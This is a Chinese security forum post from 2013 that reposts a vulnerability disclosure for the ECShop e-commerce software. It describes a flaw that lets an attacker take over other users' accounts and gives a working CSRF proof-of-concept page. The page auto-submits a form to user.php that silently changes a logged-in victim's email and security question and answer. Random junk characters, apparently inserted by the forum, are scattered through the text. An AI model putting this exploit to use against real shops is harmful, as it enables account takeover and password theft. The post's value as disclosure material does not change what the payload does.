找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1945|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
简要描述:
+ O5 T8 L& w. I0 p1 Decshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
1 n( T' O' n2 W2 d
# f  K+ D" K1 Z, e+ P6 LDemo For:http://www.wooyun.org/bug.php?action=view&id=395) d: [3 u- ~1 O- f4 Q& R7 i
" u: S) k3 d5 T2 x1 }" p+ E$ X, r
详细说明:, ?: \* z) R( S- ]8 Q2 K
利用csrf和xss可以突破官方所说的“障碍”
8 {5 \3 S% w  s: Y0 x5 yxss版本已经有人说明+ o0 w! G3 [$ N; l8 E6 Y) p; ~. H
这里给出csrf版本
& ?8 w1 @7 t/ U6 K" ]5 g8 w" G; h1 l6 U3 p5 Z8 a. s
漏洞证明:4 d) Y+ r: ~/ l2 I3 o
<html>- s. @* N1 l1 V7 r% K! C
<body>0 \$ C8 V& ~: f. `( |& l+ c# _
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
' Z4 R% X' X' s) c3 f; M<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
/ D% N7 d, X7 B* J* p) W<INPUT TYPE="text" NAME="act" value="act_edit_profile">; X% j6 |1 [& Q$ d  |
<INPUT TYPE="text" NAME="sel_question" value="ecshop">0 u9 {" {7 V& ]% s6 i# `
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">5 Y; d% P' x* i1 {' C  n: G
</body>
! A1 T$ v. `1 y1 C! e' Z. r7 R<script>, M: T& [7 {2 z' e; Q4 c
document.forms[0].submit();
9 k1 e! W& L* R# T/ X</script>
, ~4 o& W: }& I</html>
+ E7 S& Y- l; r* Z构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失- ~4 J) v  ?5 o& f% C
+ A4 p6 B. H+ y/ f
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表